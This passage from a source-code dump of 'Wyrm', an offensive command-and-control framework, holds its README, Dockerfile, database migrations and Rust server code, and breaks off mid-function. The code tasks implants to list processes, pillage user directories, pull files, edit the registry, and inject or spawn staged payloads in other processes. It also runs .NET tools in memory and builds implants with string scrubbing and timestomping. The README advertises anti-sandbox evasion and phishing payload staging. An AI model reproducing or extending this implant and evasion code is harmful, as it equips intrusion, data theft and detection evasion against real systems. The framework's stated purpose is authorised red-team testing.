- Easy mechanism to stage files (such as built implants, PDF, zip, etc) on the C2 for download to support phishing campaigns and initial attack vectors
- Supports native Windows API commands, more planned in future updates
- Easy to use terminal client for the operator to task & inspect agents, and to manage staged resources
- Implant uses the most common User-Agent for comms to help it blend in covertly with traffic by default, this is also configurable to suit your engagement
- Easy, automated C2 infrastructure deployment with docker
- Execute dotnet binaries in memory
- Anti-sandbox techniques which are highly configurable by the operator through profiles
- Backed by a database, fully timestamped to make reporting easier
- Proxy awareness (usable against clients who use proxies)

This project is not currently accepting contributions, please **raise issues** or use **GitHub Discussions** and I will look into them, and help
answer any questions.

### Loader

The Wyrm C2 comes with a loader for the reflective DLL component of the toolkit. The loader has the Wyrm postex payload encrypted in its 
.text section; for more information please see the [docs](https://docs.wyrm-c2.com/implant/rdll.html). Visually the loader runs as follows:

![Wyrm reflective DLL loader](resources/inj.svg)

### Updates

**WARNING:** Before pulling an update; please check the [release notes](https://github.com/0xflux/Wyrm/blob/master/RELEASE_NOTES.md) to see whether there are any breaking changes - for example if the
**configurable C2 profile** changes in a breaking way from a previous profile you have, you will want to make sure you backup and migrate
your profile. I will be excluding `/c2/profiles/*` and `.env` from git once the project is published in pre-release to prevent accidentally overwriting
your previous profile when running `git pull` to update your software.

As per the roadmap, this project will see significant development over the next 12 months. To pull updates, whether they are new features
or bug fixes, you simply just do a **git pull**, re-build via docker: `docker compose up -d --build c2` and `docker compose up -d --build client`.

# The legal bit

## Authorized Use Only

**Permitted Users**

The Software is intended **exclusively** for **authorised** penetration testers, Red Teams, Purple Teams, hobbyists, and security researchers who have obtained **explicit, written authorisation from the owner of each target system**.

Any use of the Software on systems for which you do not hold such authorisation is **strictly prohibited** and may constitute a criminal offence under the UK Computer Misuse Act 1990 (including sections on Unauthorised access to computer material, Unauthorised access with intent to commit further offences, and Unauthorised acts impairing operation) or equivalent laws elsewhere.

## Prohibited Conduct
You must not use, distribute, or facilitate use of the Software for:

- Unauthorised Access (CMA 1990, Section 1) — hacking into systems or accounts without permission.
- Unauthorised Modification (CMA 1990, Section 3) — altering, deleting, or corrupting data or programs you have no right to modify.
- Denial-of-Service (CMA 1990, Section 3A) — disrupting or interrupting any service, network, or application.
- Malware/Ransomware Creation — writing, incorporating, or deploying code intended to extort, damage, or hold data hostage.
- Any other malicious, unlawful, or harmful activities.

Or equivalent offenses in other jurisdictions.

**No Encouragement of Misuse:**

The Author expressly **does not condone, support, or encourage** any illegal or malicious activity. This Software is provided purely for legitimate security-testing purposes, in environments where full authorisation has been granted.

## Compliance with Laws & Regulations

**Local Laws**: You alone are responsible for ensuring your use of the Software complies with all applicable local, national, and international laws, regulations, and corporate policies.

## No Warranty

The Software is provided “as is” and “as available”, without warranties of any kind, express or implied.

We make no warranty of merchantability, fitness for a particular purpose, or non-infringement.

We do not warrant that the Software is error-free, secure, or uninterrupted.

## Limitation of Liability

To the fullest extent permitted by law, neither the Author nor contributors shall be liable for any:

- Direct, indirect, incidental, special, punitive, or consequential damages.
- Loss of revenue, profits, data, or goodwill.
- Costs of procurement of substitute goods or services.

This limitation applies even if we have been advised of the possibility of such damages. It is the responsibility of the professional operator to
use this tool safely.

================================================
FILE: c2/Cargo.toml
================================================
[package]
name = "c2"
version = "0.1.0"
edition = "2024"

[dependencies]
shared = { path = "../shared" }
axum = { version = "0.8", features = ["macros", "multipart"] }
serde = "1.0"
tokio = { version = "1.43", features = ["full"] }
serde_json = "1"
dotenvy = "0.15.7"
sqlx = { version = "0.8", features = ["postgres", "runtime-tokio-native-tls", "migrate"] }
chrono = { version = "0.4", features = ["serde"] }
shared_c2_client = { path = "../shared_c2_client" }
tokio-util = { version = "0.7.15", features = ["io"] }
http-body-util = "0.1.3"
rand = "0.9.1"
base64 = "0.22.1"
rust-crypto = "0.2.36"
futures = "0.3"
toml = "0.9.6"
thiserror = "2.0"
tower-http = { version = "0.6", features = ["cors", "catch-panic"]}
axum-extra = { version = "0.12.0", features = ["cookie"] }


================================================
FILE: c2/Dockerfile
================================================
FROM lukemathwalker/cargo-chef:latest-rust-1.90-bookworm AS chef
WORKDIR /app

# Planner stage: compute the cargo-chef recipe so dependency builds are cached
# independently of application source changes.
FROM chef AS planner
WORKDIR /app
COPY . .
RUN cargo chef prepare --recipe-path recipe.json

# Builder stage: cook (pre-build) dependencies from the recipe, then build the c2 binary.
FROM chef AS builder
WORKDIR /app

COPY --from=planner /app/recipe.json ./recipe.json
RUN cargo +nightly chef cook --release -p c2 --recipe-path recipe.json
COPY . .
RUN cargo +nightly build -p c2 --release

# Runtime stage: a full Rust image (not a slim base) because the C2 cross-compiles
# Windows implants on demand at runtime.
FROM rust:1.90-bookworm AS runtime

RUN echo "Installing environment dependencies..."
# Update and install in a single layer so the apt package index can never be stale
# relative to the install. Fixes from the original file: the package list ended a
# continuation line with "\ " (backslash + trailing space), breaking the command,
# and 'clang' was listed twice.
RUN apt update -qq && apt install -qq -y build-essential \
    pkg-config libssl-dev gcc-mingw-w64-x86-64 \
    g++-mingw-w64-x86-64 curl libgtk-3-dev clang p7zip-full \
    lld llvm

# Expose MSVC-style tool names (llvm-lib, lld-link, clang-cl) via their LLVM
# equivalents, used by the x86_64-pc-windows-msvc cross builds below.
RUN set -eux; \
    if command -v llvm-lib-14   >/dev/null 2>&1; then ln -sf /usr/bin/llvm-lib-14   /usr/bin/llvm-lib; fi; \
    if command -v ld.lld        >/dev/null 2>&1; then ln -sf /usr/bin/ld.lld        /usr/bin/lld-link; fi; \
    if command -v clang         >/dev/null 2>&1; then ln -sf /usr/bin/clang         /usr/bin/clang-cl; fi

RUN echo "Installing toolchains..."
RUN rustup toolchain install nightly && rustup component add llvm-tools

# MSVC targets so the container can produce Windows binaries.
RUN rustup target add x86_64-pc-windows-msvc
RUN rustup target add x86_64-pc-windows-msvc --toolchain nightly
RUN cargo install cargo-xwin

RUN rustup override set nightly

EXPOSE 8087
WORKDIR /app
# Persistent volume for data the C2 writes at runtime.
VOLUME ["/data"]

# Ship the compiled server plus the source trees used for runtime payload builds.
COPY --from=builder /app/target/release/c2 .
COPY --from=builder /app/c2/profiles/ ./profiles
COPY --from=builder /app/implant/ ./implant/
COPY --from=builder /app/shared_no_std/ ./shared_no_std/
COPY --from=builder /app/shared/ ./shared/
COPY --from=builder /app/loader/ ./loader/

# Keep temp build artifacts inside the image's implant workspace.
RUN mkdir -p /app/implant/.tmp
ENV TMPDIR=/app/implant/.tmp

ENTRYPOINT ["/app/c2"]

================================================
FILE: c2/Readme.md
================================================
# C2

Before using the C2, you **SHOULD** change the default admin token and database creds found in the `../.env` for security purposes.

## TLDR

- As above, edit the `../.env` file to use your own creds - this is for security purposes.
- To run the C2, from the root directory (`../`) run `docker compose up -d --build c2`. On first run this may take a few minutes.
- To connect to the C2, you should use the client which can be run via: `docker compose up -d --build client` and is served on port 4040 by default.
- The C2 uses a docker volume `/data` to store loot as well as other persistent files.

## Info

The C2 module handles only the command and control server implementation and does not deal with showing a GUI as output.
That is handled by the `client` crate which you can run via docker.

The C2 has logging for API endpoint access attempts, errors, and logins. **Note:** there is no in-built log rotation, so you may wish to use
the linux `logrotate` application to manage these.

- `Logins`
  - This log file is managed in such a way that repeat successful logins from an IP will not be recorded; only the first successful login is logged
  - This will log all cases where an IP makes repeated failed logins
  - This log can be disabled via the `.env` file, adding: `DISABLE_ACCESS_LOG=1`.
  - The log file will show (by default) the plaintext password of **unsuccessful logins** for intelligence gain, this is entirely dependent upon your threat model. To turn this feature off, add `DISABLE_PLAINTXT_PW_BAD_LOGIN=1` to your `.env`.
- `Access`
  - This log could get unwieldy and it can be disabled through the C2 `.env` file, by adding `DISABLE_ACCESS_LOG=1`. This will record all visits to endpoint URI's and record if the access was legitimate (from an agent) or not (scanners, researchers, etc). It is enabled by default and you should consider manually pruning the log, or automating with `logrotate`
- `Error`
  - A simple log file which shows C2 error messages to assist in bug reporting / debugging
  - This log file cannot be disabled


================================================
FILE: c2/migrations/20250614124105_agent_table.sql
================================================
-- Add migration script here
CREATE TABLE agents (
    id SERIAL PRIMARY KEY,
    first_check_in TIMESTAMPTZ DEFAULT now()
);

================================================
FILE: c2/migrations/20250614124140_add_sleep.sql
================================================
ALTER TABLE agents ADD COLUMN sleep BIGINT;

================================================
FILE: c2/migrations/20250614132037_tasks.sql
================================================
-- Add migration script here
CREATE TABLE tasks (
    id SERIAL PRIMARY KEY,
    uid TEXT NOT NULL,
    data TEXT
);

================================================
FILE: c2/migrations/20250615070633_flesh_table.sql
================================================
-- Add migration script here
ALTER TABLE tasks
  ADD COLUMN completed   BOOLEAN    NOT NULL DEFAULT FALSE,
  ADD COLUMN agent_id    INTEGER    NOT NULL,
  ADD CONSTRAINT fk_tasks_agent
    FOREIGN KEY (agent_id)
    REFERENCES agents (id)
    ON DELETE CASCADE;

CREATE INDEX idx_tasks_incomplete
  ON tasks (agent_id)
  WHERE completed = FALSE;

================================================
FILE: c2/migrations/20250615072852_add_col_back_tasks.sql
================================================
-- Add migration script here
ALTER TABLE tasks
  ADD COLUMN command_id INT;

================================================
FILE: c2/migrations/20250615085223_add_uid.sql
================================================
-- Add migration script here
ALTER TABLE agents
  ADD COLUMN uid TEXT;

================================================
FILE: c2/migrations/20250615085245_add_uid.sql
================================================
-- Add migration script here


================================================
FILE: c2/migrations/20250615211204_rm_col_from_tasks.sql
================================================
-- Add migration script here
ALTER TABLE public.tasks
  DROP COLUMN IF EXISTS uid;

================================================
FILE: c2/migrations/20250616171233_ch_col.sql
================================================
-- Add migration script here
BEGIN;

ALTER TABLE tasks
  DROP CONSTRAINT IF EXISTS fk_tasks_agent;
DROP INDEX IF EXISTS idx_tasks_incomplete;

ALTER TABLE agents
  ADD CONSTRAINT uq_agents_uid UNIQUE(uid);

ALTER TABLE tasks
  ADD COLUMN new_agent_id TEXT NOT NULL DEFAULT '';

UPDATE tasks
SET new_agent_id = agents.uid
FROM agents
WHERE tasks.agent_id = agents.id;

ALTER TABLE tasks
  DROP COLUMN agent_id;
ALTER TABLE tasks
  RENAME COLUMN new_agent_id TO agent_id;

ALTER TABLE tasks
  ADD CONSTRAINT fk_tasks_agent
    FOREIGN KEY (agent_id)
    REFERENCES agents(uid)
    ON DELETE CASCADE;

CREATE INDEX idx_tasks_incomplete 
  ON tasks (agent_id)
  WHERE completed = FALSE;

COMMIT;

================================================
FILE: c2/migrations/20250619055731_results_table.sql
================================================
-- Add migration script here
CREATE TABLE completed_tasks (
    id SERIAL PRIMARY KEY,
    task_id INT NOT NULL,
    result TEXT,
    client_pulled_update BOOLEAN NOT NULL DEFAULT FALSE,
    time_completed TIMESTAMPTZ NOT NULL DEFAULT now()
);

================================================
FILE: c2/migrations/20250621175632_add_time.sql
================================================
-- Add migration script here
ALTER TABLE agents
  ADD COLUMN last_check_in TIMESTAMPTZ DEFAULT now();

================================================
FILE: c2/migrations/20250621180355_add_time.sql
================================================
-- Add migration script here


================================================
FILE: c2/migrations/20250622075242_agent_staging.sql
================================================
-- Add migration script here
CREATE TABLE agent_staging (
    id SERIAL PRIMARY KEY,
    date_added TIMESTAMPTZ DEFAULT now(),
    agent_name TEXT NOT NULL,
    host TEXT NOT NULL,
    c2_endpoint TEXT NOT NULL,
    staged_endpoint TEXT NOT NULL,
    sleep_time INT NOT NULL
);

================================================
FILE: c2/migrations/20250622080004_protect_staging.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
    ADD CONSTRAINT uq_agent_name UNIQUE (agent_name),
    ADD CONSTRAINT uq_c2_endpoint UNIQUE (c2_endpoint),
    ADD CONSTRAINT uq_staged_endpoint UNIQUE (staged_endpoint);

================================================
FILE: c2/migrations/20250622080748_remove_constraint.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  DROP CONSTRAINT IF EXISTS uq_c2_endpoint;

================================================
FILE: c2/migrations/20250622083052_add_col_staging.sql
================================================
-- Add migration script here
ALTER TABLE agents
  ADD COLUMN pe_name TEXT;

UPDATE agents
  SET pe_name = 'oops'
  WHERE pe_name IS NULL;

ALTER TABLE agents
  ALTER COLUMN pe_name SET NOT NULL;

================================================
FILE: c2/migrations/20250622094131_add_col_staging_again.sql
================================================
ALTER TABLE agent_staging
  ADD COLUMN pe_name TEXT NOT NULL;

================================================
FILE: c2/migrations/20250622094232_del_col_agent.sql
================================================
-- Add migration script here
ALTER TABLE agents DROP COLUMN pe_name;

================================================
FILE: c2/migrations/20250622122051_protect_pe_name.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
    ADD CONSTRAINT uq_pe_name UNIQUE (pe_name);

================================================
FILE: c2/migrations/20250622130349_port_to_agent_staging.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  ADD COLUMN port INT NOT NULL;

================================================
FILE: c2/migrations/20250622154423_operator_table.sql
================================================
-- Add migration script here
CREATE TABLE operators (
    id SERIAL PRIMARY KEY,
    date_created TIMESTAMPTZ DEFAULT now(),
    username TEXT NOT NULL,
    password_hash TEXT NOT NULL,
    salt TEXT NOT NULL
);

================================================
FILE: c2/migrations/20250622161952_db_add_cstr.sql
================================================
-- Add migration script here
ALTER TABLE operators
    ADD CONSTRAINT uq_username_operator UNIQUE (username);

================================================
FILE: c2/migrations/20250624164511_col_for_toks.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  ADD COLUMN security_token TEXT NOT NULL;

================================================
FILE: c2/migrations/20250627184526_default_env.sql
================================================
-- actually, not needed

================================================
FILE: c2/migrations/20250712164452_update_field_for_sleep.sql
================================================
ALTER TABLE agent_staging
  ALTER COLUMN sleep_time TYPE BIGINT;

================================================
FILE: c2/migrations/20250712164815_update_field_for_prt.sql
================================================
ALTER TABLE agent_staging
  ALTER COLUMN port TYPE INT;

================================================
FILE: c2/migrations/20250712165040_update_field_for_prt_again.sql
================================================
ALTER TABLE agent_staging
  ALTER COLUMN port TYPE SMALLINT;

================================================
FILE: c2/migrations/20250719090503_rm_constraint_upload.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  DROP CONSTRAINT IF EXISTS uq_agent_name;

================================================
FILE: c2/migrations/20250727101559_xor_payload.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  ADD COLUMN xor_key smallint DEFAULT 0;

================================================
FILE: c2/migrations/20251025085314_update_time_completed_field.sql
================================================
-- Add migration script here
ALTER TABLE completed_tasks
ALTER COLUMN time_completed DROP DEFAULT;

================================================
FILE: c2/migrations/20251026120715_change_dt_field.sql
================================================
-- Add migration script here
-- ALTER TABLE completed_tasks
-- ALTER COLUMN time_completed TYPE BIGINT
-- USING time_completed::bigint;

================================================
FILE: c2/migrations/20251026121136_change_dt_field_2.sql
================================================
-- Add migration script here
ALTER TABLE completed_tasks
ADD COLUMN time_completed_ms BIGINT NOT NULL
    DEFAULT ((EXTRACT(EPOCH FROM now()) * 1000)::BIGINT);

UPDATE completed_tasks
SET time_completed_ms = ((EXTRACT(EPOCH FROM time_completed) * 1000)::BIGINT)
WHERE time_completed IS NOT NULL;

================================================
FILE: c2/migrations/20251026122000_time_comp_rm.sql
================================================
-- Add migration script here
ALTER TABLE completed_tasks DROP COLUMN time_completed;

================================================
FILE: c2/migrations/20251026144632_add_agent_id_to_ct.sql
================================================
-- Add migration script here
ALTER TABLE completed_tasks
    ADD COLUMN agent_id TEXT;

ALTER TABLE completed_tasks
    ADD COLUMN command_id INT;

================================================
FILE: c2/migrations/20251119185937_add_pulled_col.sql
================================================
-- Add migration script here
ALTER TABLE tasks
  ADD COLUMN fetched BOOL;

================================================
FILE: c2/migrations/20251127184944_download_col.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
    ADD COLUMN num_downloads INT NOT NULL DEFAULT 0;

================================================
FILE: c2/migrations/20251127193415_make_bigint.sql
================================================
ALTER TABLE agent_staging
    ALTER COLUMN num_downloads TYPE BIGINT;

ALTER TABLE agent_staging
    ALTER COLUMN num_downloads SET DEFAULT 0;

================================================
FILE: c2/migrations/20251207091938_beacon_console_line.sql
================================================
-- Add migration script here
INSERT INTO agents (uid, sleep)
VALUES ('doesntmatterwhatthisis', 1);

================================================
FILE: c2/migrations/20251207092341_testagent.sql
================================================
-- Add migration script here
INSERT INTO tasks (agent_id, fetched)
VALUES ('doesntmatterwhatthisis', false);

================================================
FILE: c2/migrations/20251215120000_completed_tasks_pending_idx.sql
================================================
-- Add migration script here
CREATE INDEX IF NOT EXISTS idx_completed_tasks_agent_pending
  ON completed_tasks (agent_id)
  WHERE client_pulled_update = FALSE;



================================================
FILE: c2/migrations/20251215123000_tasks_fetched_default.sql
================================================
-- Add migration script here
UPDATE tasks
SET fetched = FALSE
WHERE fetched IS NULL;

ALTER TABLE tasks
    ALTER COLUMN fetched SET DEFAULT FALSE;

ALTER TABLE tasks
    ALTER COLUMN fetched SET NOT NULL;


================================================
FILE: c2/src/admin_task_dispatch/dispatch_table.rs
================================================
use std::sync::Arc;

use crate::{
    admin_task_dispatch::{
        delete_staged_resources, drop_file_handler,
        execute::{SpawnInject, dotex, spawn_inject_with_network_resource},
        export_completed_tasks_to_json,
        implant_builder::stage_file_upload_from_users_disk,
        list_agents, list_staged_resources, remove_agent_from_list, show_server_time, task_agent,
        task_agent_sleep,
    },
    app_state::AppState,
    logging::log_error_async,
};
use axum::extract::State;
use serde_json::Value;
use shared::tasks::{AdminCommand, Command};

/// Main dispatcher for admin commands issued on the server, which may, or may not, include an
/// implant UID.
pub async fn admin_dispatch(
    uid: Option<String>,
    command: AdminCommand,
    state: State<Arc<AppState>>,
) -> Vec<u8> {
    // Note, due to the use of generics with the function `task_agent`, if you are passing `None`
    // into the function, you will have to turbofish a type which does implement ToString - so,
    // to keep it simple, just turbofish String - it will be discarded as the `None` path will be
    // taken
    let result: Option<Value> = match command {
        AdminCommand::Sleep(time) => task_agent_sleep(time, uid.unwrap(), state).await,
        AdminCommand::ListAgents => list_agents(state).await,
        AdminCommand::ListProcesses => {
            task_agent::<String>(Command::Ps, None, uid.unwrap(), state).await
        }
        AdminCommand::GetUsername => todo!(),
        AdminCommand::ListUsersDirs => {
            task_agent::<String>(Command::Pillage, None, uid.unwrap(), state).await
        }
        AdminCommand::Pwd => task_agent::<String>(Command::Pwd, None, uid.unwrap(), state).await,
        AdminCommand::Cd(path_buf) => {
            task_agent(Command::Cd, Some(path_buf), uid.unwrap(), state).await
        }
        AdminCommand::KillAgent => {
            task_agent::<String>(Command::KillAgent, None, uid.unwrap(), state).await
        }
        AdminCommand::Ls => task_agent::<String>(Command::Ls, None, uid.unwrap(), state).await,
        AdminCommand::ShowServerTime => show_server_time(),
        AdminCommand::Login => Some(serde_json::to_value("success").unwrap()),
        AdminCommand::ListStagedResources => list_staged_resources(state).await,
        AdminCommand::Run(args) => task_agent(Command::Run, Some(args), uid.unwrap(), state).await,
        AdminCommand::DeleteStagedResource(download_endpoint) => {
            delete_staged_resources(state, download_endpoint).await
        }
        AdminCommand::RemoveAgentFromList => remove_agent_from_list(state, uid.unwrap()).await,
        AdminCommand::Undefined => panic!("This should never happen."),
        AdminCommand::StageFileOnC2(metadata) => {
            stage_file_upload_from_users_disk(metadata, state).await
        }
        AdminCommand::KillProcessById(pid) => {
            task_agent::<String>(Command::KillProcess, Some(pid), uid.unwrap(), state).await
        }
        AdminCommand::Drop(data) => drop_file_handler(uid, data, state).await,
        AdminCommand::Copy(inner) => {
            // Serialise the (String, String) to just a String so we can use it with the
            // generic task_agent.
            let inner_serialised = match serde_json::to_string(&inner) {
                Ok(s) => Some(s),
                Err(e) => {
                    log_error_async(&e.to_string()).await;
                    None
                }
            };

            if inner_serialised.is_some() {
                task_agent::<String>(Command::Copy, inner_serialised, uid.unwrap(), state).await
            } else {
                None
            }
        }
        AdminCommand::Move(inner) => {
            // Serialise the (String, String) to just a String so we can use it with the
            // generic task_agent.
            let inner_serialised = match serde_json::to_string(&inner) {
                Ok(s) => Some(s),
                Err(e) => {
                    log_error_async(&e.to_string()).await;
                    None
                }
            };

            if inner_serialised.is_some() {
                task_agent::<String>(Command::Move, inner_serialised, uid.unwrap(), state).await
            } else {
                // Error logged in above failure path
                None
            }
        }
        AdminCommand::Pull(file_path) => {
            task_agent(Command::Pull, Some(file_path), uid.unwrap(), state).await
        }
        AdminCommand::BuildAllBins(_) => None,
        AdminCommand::RegQuery(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RegQuery, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::RegAdd(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RegAdd, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::RegDelete(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RegDelete, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::RmFile(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RmFile, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::RmDir(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RmDir, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::ExportDb => export_completed_tasks_to_json(uid.unwrap(), state).await,
        AdminCommand::None => None,
        AdminCommand::DotEx(dot_ex_inner) => dotex(uid, dot_ex_inner, state.clone()).await,
        AdminCommand::WhoAmI => {
            task_agent::<String>(Command::WhoAmI, None, uid.unwrap(), state).await
        }
        AdminCommand::Spawn(download_name) => {
            spawn_inject_with_network_resource(
                uid,
                SpawnInject::Spawn(download_name),
                state.clone(),
            )
            .await
        }
        AdminCommand::StaticWof(name) => {
            task_agent::<String>(Command::StaticWof, Some(name), uid.unwrap(), state).await
        }
        AdminCommand::Inject(inject_inner) => {
            spawn_inject_with_network_resource(
                uid,
                SpawnInject::Inject(inject_inner),
                state.clone(),
            )
            .await
        }
    };

    serde_json::to_vec(&result).unwrap()
}


================================================
FILE: c2/src/admin_task_dispatch/execute.rs
================================================
use std::{path::PathBuf, sync::Arc};

use axum::extract::State;
use serde_json::Value;
use shared::{
    task_types::DotExDataForImplant,
    tasks::{Command, DotExInner, InjectInnerForAdmin, InjectInnerForPayload},
};

use crate::{
    TOOLS_PATH, admin_task_dispatch::task_agent, app_state::AppState, logging::log_error_async,
};

/// Executes dotnet in the current process
///
/// Reads the requested tool from the server's tools directory, bundles the raw
/// bytes with the operator supplied args, and queues a `DotEx` task for the
/// agent. Returns `Some(Value)` only on a read failure, `None` otherwise.
pub async fn dotex(
    uid: Option<String>,
    data: DotExInner,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    // Resolve the tool path relative to the server-side tools directory
    let tool_on_disk = PathBuf::from(TOOLS_PATH).join(&data.tool_path);

    // Read the tool, ret an error wrapped in an Option if it happens.. I regret this pattern rn
    let tool_bytes = match tokio::fs::read(&tool_on_disk).await {
        Err(e) => {
            let msg = format!("Could not read file. {e}");
            log_error_async(&msg).await;
            return Some(serde_json::to_value(msg).unwrap());
        }
        Ok(bytes) => bytes,
    };

    // Package the raw tool bytes together with the args for the implant
    let payload: DotExDataForImplant = (tool_bytes, data.args);
    let serialised = serde_json::to_string(&payload).unwrap();

    let _ = task_agent(Command::DotEx, Some(serialised), uid.unwrap(), state).await;

    None
}

/// The internal (staged) file name of a payload held on the C2.
type InternalName = String;

/// Options for preparing the delivery of the inject inner payload
pub enum SpawnInject {
    /// Spawn using the named staged payload
    Spawn(InternalName),
    /// Inject options include the pid
    Inject(InjectInnerForAdmin),
}

/// Tasks an agent to spawn or inject a payload staged on the C2 as a network
/// resource.
///
/// The staged file named by `type_of` is read from the in-memory endpoint
/// store, serialised, and queued as either a `Spawn` or `Inject` task for the
/// agent identified by `uid`.
///
/// # Returns
/// `None` both on success (the task is queued) and on failure (the failure is
/// logged server-side).
pub async fn spawn_inject_with_network_resource(
    uid: Option<String>,
    type_of: SpawnInject,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    // Clone the endpoint table out of the read lock so the guard is not held
    // across the await points below.
    let endpoints = {
        let guard = state.endpoints.read().await;
        guard.clone()
    };

    // Both variants carry the internal (staged) name of the payload to deliver
    let internal_name: &String = match &type_of {
        SpawnInject::Spawn(s) => s,
        SpawnInject::Inject(inner) => &inner.download_name,
    };

    let file_data = match endpoints.read_staged_file_by_file_name(internal_name).await {
        Ok(buf) => buf,
        Err(e) => {
            let msg = format!("Failed to read file data for spawn/inject. {}", e);
            log_error_async(&msg).await;
            return None;
        }
    };

    drop(endpoints);

    // Decide the command and build its serialised metadata in one place so the
    // serialisation error handling is not duplicated per variant.
    let (command, serialised) = match type_of {
        SpawnInject::Spawn(_) => (Command::Spawn, serde_json::to_string(&file_data)),
        SpawnInject::Inject(inner) => {
            // The implant receives the payload bytes alongside the target pid
            let constructed_for_wyrm = InjectInnerForPayload {
                payload_bytes: file_data,
                pid: inner.pid,
            };

            (Command::Inject, serde_json::to_string(&constructed_for_wyrm))
        }
    };

    let ser = match serialised {
        Ok(s) => s,
        Err(e) => {
            let msg = format!("Failed to serialise file data for spawn/inject. {}", e);
            log_error_async(&msg).await;
            return None;
        }
    };

    task_agent::<String>(command, Some(ser), uid.unwrap(), state).await
}


================================================
FILE: c2/src/admin_task_dispatch/implant_builder.rs
================================================
use std::{
    env::current_dir,
    fs::create_dir_all,
    path::{Path, PathBuf},
    sync::Arc,
};

use axum::extract::State;
use serde_json::Value;
use shared::tasks::{FileUploadStagingFromClient, NewAgentStaging, StageType, WyrmResult};
use tokio::{
    fs,
    io::{self, AsyncReadExt},
};

use crate::{
    FILE_STORE_PATH, WOFS_PATH,
    admin_task_dispatch::{
        add_api_endpoint_for_staged_resource, is_download_staging_url_error, remove_dir,
        remove_file,
    },
    app_state::AppState,
    logging::log_error_async,
    pe_utils::{scrub_strings, timestomp_binary_compile_date},
    profiles::{Profile, parse_exports_to_string_for_env},
};

/// Absolute path where freshly built payloads land before being zipped.
/// NOTE(review): assumes the c2 runs under `/app` (i.e. the Docker container);
/// this is the absolute form of the relative `./profiles/tmp` used by
/// `build_all_bins` — confirm for bare-metal installs.
const FULLY_QUAL_PATH_TO_FILE_BUILD: &str = "/app/profiles/tmp";

/// Builds all binaries from a given profile
///
/// The built payloads are written to a temporary directory, zipped with `7z`,
/// and the archive's bytes are returned to the caller. Both the temporary
/// directory and the archive are removed from disk before returning.
///
/// # Args
/// - `implant_profile_name`: the profile to build, or `"all"` (case
///   insensitive) to build every implant in the loaded profile.
///
/// # Returns
/// The raw bytes of the resulting `.7z` archive, or a human readable error.
pub async fn build_all_bins(
    implant_profile_name: &String,
    state: State<Arc<AppState>>,
) -> Result<Vec<u8>, String> {
    // Save into tmp within profiles, we will delete it on completion.
    let save_path = PathBuf::from("./profiles/tmp");

    create_dir_all(&save_path).map_err(|e| {
        format!(
            "Failed to create tmp directory on c2 for profile staging. {}",
            e.kind()
        )
    })?;

    let profile = {
        // We use the saved profile in memory
        let guard = state.profile.read().await;
        (*guard).clone()
    };

    //
    // If we are building all binaries, iterate through them, otherwise just build the specified one
    //
    if implant_profile_name.to_lowercase() == "all" {
        let keys: Vec<String> = profile.implants.keys().cloned().collect();
        for key in keys {
            write_implant_to_tmp_folder(&profile, &save_path, &key, state.clone()).await?;
        }
    } else {
        write_implant_to_tmp_folder(&profile, &save_path, implant_profile_name, state.clone())
            .await?;
    }

    //
    // Finally zip up the result, and return them back to the user.
    //
    const ZIP_OUTPUT_PATH: &str = "./profiles/tmp.7z";
    let mut cmd = tokio::process::Command::new("7z");
    cmd.args(["a", ZIP_OUTPUT_PATH, &save_path.display().to_string()]);

    match cmd.output().await {
        // 7z could not be spawned at all
        Err(e) => {
            let msg = format!("Error creating 7z archive with resulting payloads. {e}");
            // Best-effort cleanup: remove_dir logs internally; do not let a
            // cleanup failure mask the real error.
            let _ = remove_dir(&save_path).await;
            return Err(msg);
        }
        // 7z ran but reported a failure; surface its stderr
        Ok(output) if !output.status.success() => {
            let msg = format!(
                "Error creating 7z archive with resulting payloads. {}",
                String::from_utf8_lossy(&output.stderr)
            );
            let _ = remove_dir(&save_path).await;
            return Err(msg);
        }
        Ok(_) => {}
    }

    //
    // At this point, we have created the 7z. We now want to read it into a buffer in memory,
    // delete the archive, then return the buffer back to the user. We will send it through as a
    // byte stream, which the client can then re-interpret as a file download.
    //
    remove_dir(&save_path).await?;

    let mut file = match tokio::fs::File::open(ZIP_OUTPUT_PATH).await {
        Ok(f) => f,
        Err(e) => {
            // The tmp dir is already gone; just drop the stray archive if any
            let _ = remove_file(ZIP_OUTPUT_PATH).await;
            return Err(format!("Error opening 7z file. {e}"));
        }
    };

    let mut buf = Vec::new();
    if let Err(e) = file.read_to_end(&mut buf).await {
        let _ = remove_file(ZIP_OUTPUT_PATH).await;
        return Err(format!("Error reading 7z file. {e}"));
    }

    remove_file(ZIP_OUTPUT_PATH).await?;

    Ok(buf)
}

/// Builds the loader crate for every stage type (exe, dll, svc) and moves the
/// resulting binaries into `save_path`, named `loader_{pe_name}.{ext}`.
///
/// # Args
/// - `dll_path`: path to the already-built implant DLL, which the loader build
///   consumes via the `DLL_PATH` env var set in `compile_loader`.
///
/// # Errors
/// Returns a human readable error; `save_path` is removed before an error is
/// returned. NOTE(review): if that cleanup itself fails, the `?` on
/// `remove_dir` returns the cleanup error in place of the original build
/// error — confirm this is acceptable.
async fn write_loader_to_tmp(
    profile: &Profile,
    save_path: &PathBuf,
    implant_profile_name: &str,
    dll_path: &PathBuf,
) -> Result<(), String> {
    // Resolve the profile into concrete staging data for this implant name
